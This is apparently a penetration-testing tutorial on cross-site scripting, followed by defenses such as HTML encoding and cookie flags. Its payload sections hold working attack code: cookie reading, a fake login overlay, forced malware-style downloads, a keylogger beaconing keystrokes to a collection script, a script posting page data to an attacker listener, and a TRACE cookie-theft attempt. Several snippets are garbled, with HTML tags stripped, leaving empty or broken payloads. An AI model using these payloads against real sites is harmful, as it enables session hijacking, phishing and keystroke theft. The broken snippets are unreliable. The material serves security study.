Conducting Penetration Testing using OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)


Cross-site scripting (XSS) vulnerabilities happen when an application integrates external data into a new webpage without proper security checks or encoding. They can also occur when an existing webpage is modified with user-provided data using browser functions meant for creating HTML or JavaScript content. XSS enables attackers to run malicious scripts within a victim’s browser. These scripts can then hijack active user sessions, vandalize websites, or even redirect the user to harmful websites.

DOM-Based XSS
-------------

### Proof of Concept

DOM-based Cross-site Scripting: the page prints `Hi,` and then runs this inline script.

```
var pos = document.URL.indexOf("name=") + 5;                      // finds the position of the value
var userInput = document.URL.substring(pos, document.URL.length); // copies the value into userInput
document.write(unescape(userInput));                              // writes the decoded value straight into the page
```

Bypassing XSS Validation
------------------------

```
alert(1)
>alert(1)
 Download **Click me**
![](x)
![](image.bmp)
eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41));
alert(1)
```

**Reference**  
[Uncle Jim's Javascript Utilities: CharCode Translator](http://jdstiles.com/java/cct.html)  

XSS Attack Payloads
------------------------

**Getting Cookie Data**  

```
alert(document.cookie)
```
**Redirecting Users**  

```
document.location = "http://www.google.com";
```
**Modifying Content by ID**  

```
document.getElementById('main_menu').innerHTML = "Hello!";
```
**Modifying Content within the Body**  

```
document.getElementsByTagName('body')[0].innerHTML = "<img src=\"https://www.techworm.net/wp-content/uploads/2016/11/common-signs-youve-been-hacked-1.jpg\" width=\"100%\"/>";

document.getElementsByTagName('body')[0].innerHTML = "<iframe src=\"http://192.168.66.1/dvwa\" width=\"100%\" style=\"border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100% \"/>";
```
**Creating a Fake Login**  

```
document.write('Session timeout. Please login again.');
document.write('');
document.write('');
var string = "Password submitted to hacker website. ;)";
document.write('');
```
**Accessing Local File Content**  

```
function readTextFile(file) {
  var rawFile = new XMLHttpRequest();
  rawFile.open("GET", file, false);
  rawFile.onreadystatechange = function () {
    alert(rawFile.responseText);
  };
  rawFile.send(null);
}
```
**Forcing a Download**  

```
var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = '';
document.body.appendChild(link);
link.click();
```

```
var url = "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";
window.location = url;
```
**Logging Keystrokes**  

```
var keys = 3;
document.onkeypress = function (e) {
  var get = window.event ? event : e;
  var key = get.keyCode ? get.keyCode : get.charCode;
  key = String.fromCharCode(key);
  keys += key;
};
window.setInterval(function () {
  new Image().src = 'http://localhost/keylogger/keylogger.php?c=' + keys;
  keys = "";
}, 5);
```
**Obtaining HTTP Request Headers**  
_post.js_  

```
var url = "http://localhost/dvwa/index.php";
$.ajax({
  method: "GET",
  url: url,
  success: function (data) {
    $.post("http://192.168.24.101:8099/", data);
  }
});
```

```
document.write('');
document.write('');
```

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsIEPqsW3sTizEyKngaDiVQRD_qE-GngQPTYWRDxBIYINMxqSEomQsJnGbY4kAuxGYvXirp3ODUYELzK4FjhXsAq4MK_mz_jWf3cp2qCLKTpdV59Rfe09adeVj1v2ep1LBhzCt_qDnvnEN/s640/nc_xss.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsIEPqsW3sTizEyKngaDiVQRD_qE-GngQPTYWRDxBIYINMxqSEomQsJnGbY4kAuxGYvXirp3ODUYELzK4FjhXsAq4MK_mz_jWf3cp2qCLKTpdV59Rfe09adeVj1v2ep1LBhzCt_qDnvnEN/s1600/nc_xss.PNG)

  

Gathering Information with JavaScript
--------------------------------------

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVrHxiwknqBx6loQmCzjj8-yLBUn1Q1karTcmIheZME8SEq2tlA46oqk-kq53VJiYdQVDawh3Q8l_ajIqG12KiorTiUQfJY7kvvvl6Yd0qQ3Uu89F2aXPfj9394dPivH24Vlneri_3rc0/s640/Screen+Shot+2018-02-16+at+5.40.35+PM.png)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVrHxiwknqBx6loQmCzjj8-yLBUn1Q1karTcmIheZME8SEq2tlA46oqk-kq53VJiYdQVDawh3Q8l_ajIqG12KiorTiUQfJY7kvvvl6Yd0qQ3Uu89F2aXPfj9394dPivH24Vlneri_3rc0/s1600/Screen+Shot+2018-02-16+at+5.40.35+PM.png)

[JS Recon](https://github.com/g4xyk00/JSrecon) by _g4xyk00_

Self XSS
--------

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTbOUComBM7ca2WZDS6QzKZbvNJPOxc-Htkl4FpVxiEy5KH9d4XnZaWXOMWF0_2lXIRJyw26NWIgPajHJ8e73JvyOoKyplJ2lvfAL1pxcVcVYFsp0krBiLFkTyUjzqfCzyKZCu8DuLjub/s640/selfxss.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTbOUComBM7ca2WZDS6QzKZbvNJPOxc-Htkl4FpVxiEy5KH9d4XnZaWXOMWF0_2lXIRJyw26NWIgPajHJ8e73JvyOoKyplJ2lvfAL1pxcVcVYFsp0krBiLFkTyUjzqfCzyKZCu8DuLjub/s1600/selfxss.PNG)

**Reference:** [https://www.facebook.com/help/246962205475854](https://www.facebook.com/help/246962205475854)  
  

XSS Defense Strategies
------------

### Defense 1: Encoding HTML

```
<?php
if (isset($_GET['name'])) { // opening lines reconstructed: the original <?php line and if-condition were lost in extraction
  $name = $_GET['name'];
  $name = htmlspecialchars($name, ENT_QUOTES, 'UTF-8'); // HTML encoding
  echo "Hi, ".$name;
}
?>
```

**Without HTML Encoding:**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh69mySmYRIgOl_q3GMLiJ01TyXw9flCf2t6E-oJe8zP29Ki955kL5kHFYzJPYB3c8Yt4reyiUq-7Loi5I1sgFCEWCZIyhDWnq0edyPdS-WfFxZjGwdLkq03E50wkwumGMtrBDnJAsoN4HK/s640/encode_without.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh69mySmYRIgOl_q3GMLiJ01TyXw9flCf2t6E-oJe8zP29Ki955kL5kHFYzJPYB3c8Yt4reyiUq-7Loi5I1sgFCEWCZIyhDWnq0edyPdS-WfFxZjGwdLkq03E50wkwumGMtrBDnJAsoN4HK/s1600/encode_without.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4OZqPjCWBBGekL9BEQmQASf_Q14i-t2ZGCEUK5fJMkqPiBDcBnYPfpsCNVmv0oc7xSGTWLvDoDQHRNpXxpkCs3-uIZlmbnQM0arleAqzQBKPQOSryMmBERl85U5qEmaW7kFmGmQ5sPj8/s640/encode_without_code.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4OZqPjCWBBGekL9BEQmQASf_Q14i-t2ZGCEUK5fJMkqPiBDcBnYPfpsCNVmv0oc7xSGTWLvDoDQHRNpXxpkCs3-uIZlmbnQM0arleAqzQBKPQOSryMmBERl85U5qEmaW7kFmGmQ5sPj8/s1600/encode_without_code.PNG)

**With HTML Encoding:**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcmJa-QbneC47IqTcNo8DbTE4SXtwf80ZqUJfeD4-9HjtG0RSdcRl_PIPgp6VxAtdNb776J3cgYWNv5Iv_1UCLOD8C3_xe2ZHjBDtHeKH3Ode1P_u7SUp0DSRtr0gy5-6WAJy6eCcfUK7u/s640/encode.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcmJa-QbneC47IqTcNo8DbTE4SXtwf80ZqUJfeD4-9HjtG0RSdcRl_PIPgp6VxAtdNb776J3cgYWNv5Iv_1UCLOD8C3_xe2ZHjBDtHeKH3Ode1P_u7SUp0DSRtr0gy5-6WAJy6eCcfUK7u/s1600/encode.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihtXlaHQypw9qVgxetndPqAggRFyL6_NV9sYcnUa1sZg-Zd0xx5ngprC5LJs78oyDMvbze3hDgOK8woEteTKMDIeYilNevwLecxk0EtpvcCpoVjPzRfL35WKIzLf5LSRKBWYsDJyALH-vs/s640/encode_code.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihtXlaHQypw9qVgxetndPqAggRFyL6_NV9sYcnUa1sZg-Zd0xx5ngprC5LJs78oyDMvbze3hDgOK8woEteTKMDIeYilNevwLecxk0EtpvcCpoVjPzRfL35WKIzLf5LSRKBWYsDJyALH-vs/s1600/encode_code.PNG)

### Defense 2: Implementing HTTPOnly and Secure Flags

**HTTPOnly Flag:** This prevents client-side scripts from accessing cookie data.

**Secure Flag:** This ensures that cookies are only transmitted over secure (HTTPS) connections.

  

```
<?php
if (isset($_GET['name'])) { // opening lines reconstructed: the original <?php line and if-condition were lost in extraction
  $name = $_GET['name'];  // no encoding: the value is echoed as raw HTML
  echo "Hi, ".$name;
}
?>
```

**Without HTTPOnly and Secure Flags**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzT-9hgSNgNmzsUIFLH1m_Y5KKWMdzy4Sdtq4hsFA2fHj4SJIs-V2wkbl89bdefACxE87lhY8aBVeWeU2z_azRtVdI1qkZeQ2AOtLODEoHCdvbtTeHVaCKJoYcB-KzN3wFRr0uWnvakpg/s640/secure+and+httponly+not+set.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzT-9hgSNgNmzsUIFLH1m_Y5KKWMdzy4Sdtq4hsFA2fHj4SJIs-V2wkbl89bdefACxE87lhY8aBVeWeU2z_azRtVdI1qkZeQ2AOtLODEoHCdvbtTeHVaCKJoYcB-KzN3wFRr0uWnvakpg/s1600/secure+and+httponly+not+set.PNG)

  
**With HTTPOnly Flag Enabled**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtkPHHAFvw9gzLVEGm6dS_tf8_NklB6ezsZDNazqoEorCgZc4KsqcVUmZtej1erz-4Z282PLaiVOCzQXtEuMU44BxQq85l36JLOKR3TtT5hjymphP5DqNz3yGkwNSeJ96GWtEvdkA3Gcp/s640/httponly.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtkPHHAFvw9gzLVEGm6dS_tf8_NklB6ezsZDNazqoEorCgZc4KsqcVUmZtej1erz-4Z282PLaiVOCzQXtEuMU44BxQq85l36JLOKR3TtT5hjymphP5DqNz3yGkwNSeJ96GWtEvdkA3Gcp/s1600/httponly.PNG)

#### **Cross-Site Tracing (XST)**

Because the HTTPOnly flag is set, JavaScript cannot read the cookie directly through `document.cookie`. An older workaround is Cross-Site Tracing: if the server still answers the TRACE/TRACK method, it echoes the request back, including the Cookie header, so the cookie can be read from the response body instead.

Modern browsers block this from script: TRACE and TRACK are forbidden methods for XMLHttpRequest and fetch, so the request below is refused before it leaves the browser as "insecure," as the screenshot shows.

**Payload**  
```
 var req = new XMLHttpRequest();
 req.open("TRACE", "http://localhost/vulnerable/xss/xss_flagset.php",false);
 req.send();
 result=req.responseText;
 alert(result); 
```  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL-WyDqd0Ch82RDAAa9BAqt0DVNwaURyGK7e9EvOZzcHGLXri6o3KrlW4K2EsJbRFTivO50g-BlWQpf7_XEmokakWWmRPfsAYwjVNxqySeRvW3isQ1EEx8Phxekb_8CiL5esdvLiwqfUMp/s640/xst+browser.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL-WyDqd0Ch82RDAAa9BAqt0DVNwaURyGK7e9EvOZzcHGLXri6o3KrlW4K2EsJbRFTivO50g-BlWQpf7_XEmokakWWmRPfsAYwjVNxqySeRvW3isQ1EEx8Phxekb_8CiL5esdvLiwqfUMp/s1600/xst+browser.PNG)

Firefox: The operation is insecure.

**Original Request**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHKoaKktOILuTqyRok-s9ZKbbgo3T2iPNoIdqbOX3JbwLNZB3CvB9guWuWho69hKe0wrbtwgl30E1Ygt-v_XHWclzRJ-IxzbERjUPUtLqPuBUgXlHKfSt5gDFOKznl9GkPfDsXNIX7nJd/s640/trace_get.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHKoaKktOILuTqyRok-s9ZKbbgo3T2iPNoIdqbOX3JbwLNZB3CvB9guWuWho69hKe0wrbtwgl30E1Ygt-v_XHWclzRJ-IxzbERjUPUtLqPuBUgXlHKfSt5gDFOKznl9GkPfDsXNIX7nJd/s1600/trace_get.PNG)

  
**Modified Request**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzp5YiK8KhxzV9PZyWnJaGSliejWDke34OgECuiEyCp3N6UYBLJcNjLcU9fujYUfxL9W1N9qY6mFCP05eIXNz2vxZ29KGkLSCGKOtabqXT3NDwEoiJzXqlRAhiF0NpQrWdM5uG6Bqb-stT/s640/trace_trace.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzp5YiK8KhxzV9PZyWnJaGSliejWDke34OgECuiEyCp3N6UYBLJcNjLcU9fujYUfxL9W1N9qY6mFCP05eIXNz2vxZ29KGkLSCGKOtabqXT3NDwEoiJzXqlRAhiF0NpQrWdM5uG6Bqb-stT/s1600/trace_trace.PNG)

  
**Response**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kgKQ5ScaedOREcYXBNuuvuO57hQoDdnay30AVByIkTEROqPv_Uya1QeoBsrY7vEuQmUdwmuuoIlZzqnKefWw2Nrn2sQONcr0JBAV2FoDJNEit1p452uQ85PPuqbk2tpPDJOifDbrxRgH/s640/trace_response.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kgKQ5ScaedOREcYXBNuuvuO57hQoDdnay30AVByIkTEROqPv_Uya1QeoBsrY7vEuQmUdwmuuoIlZzqnKefWw2Nrn2sQONcr0JBAV2FoDJNEit1p452uQ85PPuqbk2tpPDJOifDbrxRgH/s1600/trace_response.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1c7WuUdhjHDmoyMutdvjDM5KJESM_8jsidd0fRPRqTsfunIAvijbeb2VwGyPAJHGocPhghQpnsTGVDxog0dnV6CcsGEKdeDoq7dGeuvvh6bQ470WaLj-rhNcTC4oKayYnRVHGM6sxm9sR/s640/trace_output.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1c7WuUdhjHDmoyMutdvjDM5KJESM_8jsidd0fRPRqTsfunIAvijbeb2VwGyPAJHGocPhghQpnsTGVDxog0dnV6CcsGEKdeDoq7dGeuvvh6bQ470WaLj-rhNcTC4oKayYnRVHGM6sxm9sR/s1600/trace_output.PNG)

This demonstrates how to potentially get cookie information through XSS combined with the TRACE method. 

**With Secure Flag Enabled (HTTP)**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT201cpMUt5KXxmRn4oBueJdR3fT7xmLsZWYG5qI81OXjDc46v0eJW7VK7Ln1WXaXWtHYRqcvsv7u9Vbo81DpJwEsUnuz7ytbL2phYCoxj1n3du1QVC-E-tNiC2YPP9MnA2qTGe0ofb0We/s640/secure_http.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT201cpMUt5KXxmRn4oBueJdR3fT7xmLsZWYG5qI81OXjDc46v0eJW7VK7Ln1WXaXWtHYRqcvsv7u9Vbo81DpJwEsUnuz7ytbL2phYCoxj1n3du1QVC-E-tNiC2YPP9MnA2qTGe0ofb0We/s1600/secure_http.PNG)

  
**With Secure Flag Enabled (HTTPS)**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikOGO6xE8RB5_ISHQv26PITGjjgRzhgEGAaCCSpxYYiHgJ1eZgMW7q63z4ss08M5uduGGa5aNMKwFJX7Kil03jCTAIek_DeSQ3CPcXYSZm5Qni69PkKik6zy9rwv1_sevP_21-3WZqqlH9/s640/secure_https.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikOGO6xE8RB5_ISHQv26PITGjjgRzhgEGAaCCSpxYYiHgJ1eZgMW7q63z4ss08M5uduGGa5aNMKwFJX7Kil03jCTAIek_DeSQ3CPcXYSZm5Qni69PkKik6zy9rwv1_sevP_21-3WZqqlH9/s1600/secure_https.PNG)

  
  
  

XSS Case Studies
--------------

**January 16, 2019 - Compromising Fortnite Accounts**  
Reference: [https://research.checkpoint.com/hacking-fortnite/](https://research.checkpoint.com/hacking-fortnite/)  
  
  
  
**January 14, 2019 - Report: Five Major Web Hosting Providers Tested, All Easily Breached**  
Reference: [https://www.websiteplanet.com/blog/report-popular-hosting-hacked/](https://www.websiteplanet.com/blog/report-popular-hosting-hacked/)  
  
  
  
**July 19, 2019 - Outlook XSS Vulnerability**  
Reference: [https://leucosite.com/Microsoft-Office-365-Outlook-XSS/?q0&fbclid=IwAR0fjR4yHykQ5rtlv6ovtXqMg14M0AWW1TQF6nkp47bS0xjdql8t4QxvLUE](https://leucosite.com/Microsoft-Office-365-Outlook-XSS/?q0&fbclid=IwAR0fjR4yHykQ5rtlv6ovtXqMg14M0AWW1TQF6nkp47bS0xjdql8t4QxvLUE)  
  
**Outlook XSS via SVG Emoji**  
```
 //
 if(location.hostname=="attachment.outlook.office.net"){
     var qsplit=location.search.split("&");
  location='https://outlook.office.com/owa/service.svc/s/GetFileAttachment'+qsplit[0]+'&'+qsplit[1];
 }else{
  alert('XSS by @qab, location.hostname='+location.hostname);
 }
 // 
```  
  
**Outlook XSS using vCalendar**  
```
X-MICROSOFT-ONLINEMEETINGEXTERNALLINK:javascript:alert(document.domain);`@qab`
```
Licensed under CC BY-NC-SA 4.0
Last updated on Jul 05, 2024 01:13 +0100